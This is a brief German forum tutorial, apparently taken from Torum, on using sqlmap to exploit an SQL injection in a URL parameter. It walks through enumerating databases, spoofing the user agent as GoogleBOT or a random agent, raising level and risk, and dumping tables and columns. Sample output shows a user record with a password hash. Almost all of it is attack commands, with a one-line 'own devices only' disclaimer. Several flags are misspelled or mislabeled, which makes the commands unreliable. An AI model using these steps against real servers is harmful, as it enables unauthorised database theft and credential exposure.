Code:
:~$ sqlmap -u "http://website.com/vulnerable?query=50" --db
Mit --user-agent= kann man einstellen, von welchem User-Agent die Anfragen kommen:
Code:
--user-agent = GoogleBOT
Code:
--random-agent
Code:
--threads=5 (Standard ist 1)
Code:
--level=5 --risk=3
Code:
--dbms=mysql (oder postgresql/microsoft sql server/ etc)
Code:
:~$ sqlmap -u "http://website.com/vulnerable?query=50" --threads=5 --level=5 --risk=3 --random-agent --dbms=mysql --keep-alive --dbs
Code:
available databases [2]:[*] information_schema[*] Main_DB (or whatever it's called)
Jetzt kann man folgendes verwenden:
Code:
-D NameDerTabelle -T TabellenName --colums --dump
Code:
-D NameDerTabelle -T Tabellenname -C ColumnName --dump
Code:
+----+---------------------------------------------+ | id | username | password +----+---------------------------------------------+ | 1 | Anon | 5f4dcc3b5aa765d61d8327deb882cf99 +----+---------------------------------------------+
Das Tutorial wird nur zum Testen an eigenen Geräten und Servern zur Verfügung gestellt. Gefunden auf Torum ohne Gewähr







